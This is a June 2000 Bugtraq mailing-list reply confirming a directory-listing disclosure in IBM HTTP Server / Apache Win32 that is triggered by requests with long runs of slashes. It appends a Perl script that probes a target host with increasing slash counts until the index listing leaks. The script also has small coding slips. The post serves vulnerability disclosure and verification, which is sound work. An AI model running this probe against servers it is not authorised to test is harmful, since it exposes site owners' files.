From: H D Moore [hdm@SECUREAUSTIN.COM]
Sent: Thursday, June 01, 2000 10:53 AM
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Re: IBM HTTP SERVER / APACHE

Hi,

I verified this on IBM_HTTP_SERVER/1.3.3 Apache/1.3.4-dev (Win32).  The
number of /'s needed were exactly the same number as Marek stated in his
original email (211 being the key number to retrieve an index listing).
Appended is an example perl script for finding _your_ magic number.  Is
this a bug merely in IBM HTTPD or Apache Win32 in general?  Does IBM set
some odd compile flag which triggers this bug in thier version?  Anyone
from the Apache group care to comment?

-HD

http://www.secureaustin.com (spidermap/nlog/etc)


Marek Roy wrote:
>
> I haven't seen any advisories for IBM HTTP SERVER running
> Apache.
>
[ snip ]
> The number of "/" used to reproduce this can be different
> from one server to another.  I don't have enough time to do
> more testing.  However, feel free to add some more info to
> this quick advisory.


----[ sample scan script to find / offset ]---- (OMG its PERL ;)

#!/usr/bin/perl

use LWP::Simple;
use strict;

my $host = shift() || die "usage:  $ARGV[0] [hostname]";
my $cnt;
my $data;
my $odata;
my $;

$odata = get("http://$host/");
if ($odata eq "")
{
    die "no response from server:  $host\n";
}
for ($i = 2; $i < 4096; $i++)
{
    print "Trying $i...\n";
    $data = get("http://$host" . ("/" x $i));
    if ($data ne $odata)
    {
        print "/ = $i\n\n$data\n\n";
        exit;
    }
}